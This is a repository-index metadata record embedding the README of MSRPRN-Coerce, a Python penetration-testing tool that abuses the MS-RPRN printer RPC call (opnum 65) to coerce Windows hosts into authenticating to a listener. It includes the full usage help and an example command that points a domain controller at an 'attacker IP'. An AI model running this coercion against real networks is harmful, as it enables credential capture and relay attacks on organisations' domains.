{"id":17995042,"url":"https://github.com/p0dalirius/msrprn-coerce","last_synced_at":"2025-09-03T17:33:45.287Z","repository":{"id":41381727,"uuid":"463112694","full_name":"p0dalirius/MSRPRN-Coerce","owner":"p0dalirius","description":"A python script to force authentication using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65). ","archived":false,"fork":false,"pushed_at":"2025-02-11T08:13:18.000Z","size":1364,"stargazers_count":21,"open_issues_count":0,"forks_count":4,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-04-06T18:22:39.411Z","etag":null,"topics":["call","coerce","printer","rpc"],"latest_commit_sha":null,"homepage":"https://podalirius.net/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/p0dalirius.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null},"funding":{"github":"p0dalirius","patreon":"Podalirius"}},"created_at":"2022-02-24T10:55:41.000Z","updated_at":"2025-03-17T15:05:57.000Z","dependencies_parsed_at":"2022-07-19T02:04:23.895Z","dependency_job_id":null,"html_url":"https://github.com/p0dalirius/MSRPRN-Coerce","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/p0dalirius/MSRPRN-Coerce","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FMSRPRN-Coerce","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FMSRPRN-Coerce/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FMSRPRN-Coerce/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FMSRPRN-Coerce/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/p0dalirius","download_url":"https://codeload.github.com/p0dalirius/MSRPRN-Coerce/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/p0dalirius%2FMSRPRN-Coerce/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273481296,"owners_count":25113558,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-03T02:00:09.631Z","response_time":76,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["call","coerce","printer","rpc"],"created_at":"2024-10-29T20:17:44.708Z","updated_at":"2025-09-03T17:33:45.278Z","avatar_url":"https://github.com/p0dalirius.png","language":"Python","funding_links":["https://github.com/sponsors/p0dalirius","https://patreon.com/Podalirius"],"categories":[],"sub_categories":[],"readme":"# MSRPRN-Coerce\n\n\u003cp align=\"center\"\u003e\n    A python script to force authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).\n    \u003cbr\u003e\n    \u003cimg alt=\"GitHub release (latest by date)\" src=\"https://img.shields.io/github/v/release/p0dalirius/MSRPRN-Coerce\"\u003e\n    \u003ca href=\"https://twitter.com/intent/follow?screen_name=podalirius_\" title=\"Follow\"\u003e\u003cimg src=\"https://img.shields.io/twitter/follow/podalirius_?label=Podalirius\u0026style=social\"\u003e\u003c/a\u003e\n    \u003ca href=\"https://www.youtube.com/c/Podalirius_?sub_confirmation=1\" title=\"Subscribe\"\u003e\u003cimg alt=\"YouTube Channel Subscribers\" src=\"https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social\"\u003e\u003c/a\u003e\n    \u003cbr\u003e\n\u003c/p\u003e\n\n![](./.github/banner.png)\n\n## Features\n\n**Requires**: A valid username and password on the domain.\n\n - [x] Force authentification using MS-RPRN `RemoteFindFirstPrinterChangeNotificationEx` function (opnum 65).\n - [x] 🐍 Python 3 and Python 2 compatibility.\n - [x] Targets either a single IP or a range of IPs.\n\n## Usage\n\n```\n$ ./MS-RPRN-Coerce.py -h\nMS-RPRN-Coerce v1.1 - by Remi GASCOU (Podalirius)\n\nusage: e.py [-h] [-v] [--dc-ip ip address] [-d DOMAIN] [-u USER] [--target-ip ip address] [--no-pass | -p PASSWORD | -H [LMHASH:]NTHASH | --aes-key hex key] [-k]\n            listener target\n\nForce authentification using MS-RPRN RemoteFindFirstPrinterChangeNotificationEx function (opnum 65).\n\npositional arguments:\n  listener              IP address or hostname of listener.\n  target                IP address or hostname of target.\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -v, --verbose         Verbose mode. (default: False)\n\nauthentication \u0026 connection:\n  --dc-ip ip address    IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the\n                        identity parameter\n  -d DOMAIN, --domain DOMAIN\n                        (FQDN) domain to authenticate to\n  -u USER, --user USER  user to authenticate with\n  --target-ip ip address\n                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or\n                        Kerberos name and you cannot resolve it\n\n  --no-pass             Don't ask for password (useful for -k)\n  -p PASSWORD, --password PASSWORD\n                        Password to authenticate with\n  -H [LMHASH:]NTHASH, --hashes [LMHASH:]NTHASH\n                        NT/LM hashes, format is LMhash:NThash\n  --aes-key hex key     AES key to use for Kerberos Authentication (128 or 256 bits)\n  -k, --kerberos        Use Kerberos authentication. Grabs credentials from .ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it\n                        will use the ones specified in the command line\n```\n\n## Example\n\nTo force `DC01.LAB.local` to authenticate over SMB to your attacker IP `192.168.2.51`:\n\n```\n./MS-RPRN-Coerce.py 192.168.2.51 DC01.LAB.local -u user1 -p 'Lab123!'\n```\n\n## Technical detail\n\nThis attack performs an RPC call of the `RpcRemoteFindFirstPrinterChangeNotificationEx` function (opnum 65) in the SMB named pipe `\\pipe\\spoolss` through the `IPC$` share to force authentication from a target machine to another.\n\n## Demo\n\nhttps://user-images.githubusercontent.com/79218792/155523928-6614ba1f-13c0-4bfc-8f42-05ef78c1e905.mp4\n\n## Contributing\n\nPull requests are welcome. Feel free to open an issue if you want to add other features.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp0dalirius%2Fmsrprn-coerce","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fp0dalirius%2Fmsrprn-coerce","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fp0dalirius%2Fmsrprn-coerce/lists"}